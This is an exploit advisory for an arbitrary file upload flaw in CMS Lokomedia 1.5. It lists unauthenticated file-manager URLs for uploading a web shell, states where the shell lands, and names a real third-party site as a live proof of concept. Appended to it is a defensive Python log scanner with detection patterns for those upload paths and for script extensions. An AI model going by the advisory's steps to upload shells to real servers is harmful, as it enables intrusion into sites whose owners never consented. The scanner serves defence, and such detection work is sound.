CMS Lokomedia 1.5 - Arbitrary File Upload

EDB-ID:

17014

CVE:

N/A




Platform:

PHP

Date:

2011-03-21



===================================================================
    CMS Lokomedia 1.5 Arbitrary file upload vulnerability
===================================================================
   
Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitrary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:	use your skill and play your imagination :P

Gratz:
- Kuris : so your status is already "married", babe.. and you didn't even invite me.. 
- Richie : RebelgiRL (Limited edition.. lol) life is never flat, so enjoy this life mate ^_^


References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
===================================================================
 

----------------------------------
 
    exploit & p0c

[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
		or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
 
    your shell or file will be placed here
 
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)		*/
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
/*==============================================================================*/
/* Once the site is online, change line 47 to the following setting:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here

----------------------------------

	live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
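As an added defensive example (not part of this advisory or of CMS Lokomedia), the following Python scan flags web-server access-log lines that hit the unauthenticated tinymcpuk/filemanager endpoints named above, or that request a script file from the tinymcpuk/gambar directory given by UserFilesPath. The log lines and client IPs are constructed for the example.

```python
import re
from collections import Counter

# Endpoints from the advisory: the bundled file manager under tinymcpuk/filemanager
FILEMANAGER_RE = re.compile(r"/tinymcpuk/filemanager/")
# UserFilesPath from the advisory: uploads are written below .../tinymcpuk/gambar
UPLOAD_DIR_RE = re.compile(r"/tinymcpuk/gambar/[^\s?\"]+")
# Server-side script extensions that should never be served from an image directory;
# the trailing group also catches double extensions such as photo.php.jpg
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)

# Apache "combined" log format: client IP, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return alert tags for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, method, status = m["path"], m["method"], m["status"]
    tags = []
    if FILEMANAGER_RE.search(path):
        tags.append("filemanager-access")
        if method == "POST":                 # a write to the file manager, i.e. an upload attempt
            tags.append("filemanager-upload")
    hit = UPLOAD_DIR_RE.search(path)
    if hit and EXEC_EXT_RE.search(hit.group(0)):
        tags.append("script-in-upload-dir")
        if status.startswith("2"):           # the server actually served the script
            tags.append("script-executed")
    return tags

def scan(lines):
    """Aggregate alert tags per client IP over a sequence of log lines."""
    hits = {}
    for line in lines:
        tags = classify(line)
        if tags:
            hits.setdefault(LOG_RE.match(line)["ip"], Counter()).update(tags)
    return hits

# Constructed sample log lines (documentation-range IPs, not from any real server)
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Mar/2011:10:00:01 +0000] "GET /tinymcpuk/filemanager/browser.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [21/Mar/2011:10:00:09 +0000] "POST /tinymcpuk/filemanager/frmupload.html HTTP/1.1" 200 312',
    '203.0.113.5 - - [21/Mar/2011:10:00:15 +0000] "GET /tinymcpuk/gambar/image.php?x=1 HTTP/1.1" 200 8800',
    '198.51.100.7 - - [21/Mar/2011:10:01:00 +0000] "GET /tinymcpuk/gambar/logo.jpg HTTP/1.1" 200 23000',
    '192.0.2.9 - - [21/Mar/2011:10:02:00 +0000] "GET /tinymcpuk/gambar/photo.php.jpg HTTP/1.1" 404 200',
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```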
   
   
====================================================================
   
    Nothing Impossible In This World Even Nobody`s Perfect
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================